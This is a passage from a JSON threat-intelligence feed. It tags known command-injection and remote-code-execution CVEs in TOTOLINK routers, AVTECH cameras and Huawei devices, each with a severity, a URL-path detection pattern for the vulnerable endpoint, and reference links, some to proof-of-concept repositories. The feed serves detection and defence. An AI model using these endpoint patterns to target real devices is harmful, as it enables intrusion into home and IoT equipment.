Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/cstecgi.cgi","reference_urls":["https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/12/TOTOlink%20A3300R%20setMacFilterRules.md"]},{"tag_id":"CVE-2024-24329","tag_type":"cve","title":"TotoLink Router setPortForwardRules - Command Injection","severity":"critical","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/cstecgi.cgi","reference_urls":["https://github.com/funny-mud-peee/IoT-vuls/blob/main/TOTOLINK%20A3300R/10/TOTOlink%20A3300R%20setPortForwardRules.md"]},{"tag_id":"CVE-2019-19824","tag_type":"cve","title":"TOTOLINK Realtek SD Routers - Remote Command Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/boafrm/formSysCmd","reference_urls":["https://sploit.tech/2019/12/16/Realtek-TOTOLINK.html","https://cybersecurity.att.com/blogs/labs-research/att-alien-labs-finds-new-golang-malwarebotenago-targeting-millions-of-routers-and-iot-devices-with-more-than-30-exploits","https://nvd.nist.gov/vuln/detail/CVE-2019-19824","https://sploit.tech","https://github.com/ARPSyndicate/kenzer-templates"]},{"tag_id":"CVE-2024-34257","tag_type":"cve","title":"TOTOLINK EX1800T TOTOLINK EX1800T - Command Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/cstecgi.cgi","reference_urls":["https://github.com/ZackSecurity/VulnerReport/blob/cve/totolink/EX1800T/1.md","https://immense-mirror-b42.notion.site/TOTOLINK-EX1800T-has-an-unauthorized-arbitrary-command-execution-vulnerability-2f3e308f5e1d45a2b8a64f198cacc350","https://github.com/20142995/nuclei-templates"]},{"tag_id":"CVE-2024-7029","tag_type":"cve","title":"AVTECH IP Camera - Command Injection","severity":"high","actively_exploited":false,"match_field":"url_path","matched_pattern":"/cgi-bin/supervisor/Factory.cgi","reference_urls":["https://www.akamai.com/blog/security-research/2024-corona-mirai-botnet-infects-zero-day-sirt","https://www.cisa.gov/news-events/ics-advisories/icsa-24-214-07","https://github.com/fkie-cad/nvd-json-data-feeds","https://github.com/nomi-sec/PoC-in-GitHub","https://github.com/Ostorlab/KEV"]},{"tag_id":"CVE-2024-51228","tag_type":"cve","title":"TOTOLINK CX-A3002RU - Remote Code Execution","severity":"medium","actively_exploited":false,"match_field":"url_path","matched_pattern":"/boafrm/formSysCmd","reference_urls":["https://github.com/yckuo-sdc/totolink-boa-api-vulnerabilities","https://totolink.tw/support_view/A3002RU","https://totolink.tw/support_view/N150RT","https://www.totolink.tw/products_view/N300RT"]},{"tag_id":"CVE-2017-17215","tag_type":"cve","title":"Huawei Router UPnP RCE / Mozi","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"DeviceUpgrade_1","reference_urls":[]},{"tag_id":"Network Device Auth Bypass / RCE Probe","tag_type":"malware","title":"Network Device Auth Bypass / RCE Probe","severity":"CRITICAL","actively_exploited":false,"match_field":"url_path","matched_pattern":"SetRemoteAccessCfg","reference_urls":[]}],"data_as_of":"2026-07-27T22:04:29.972768+00:00"}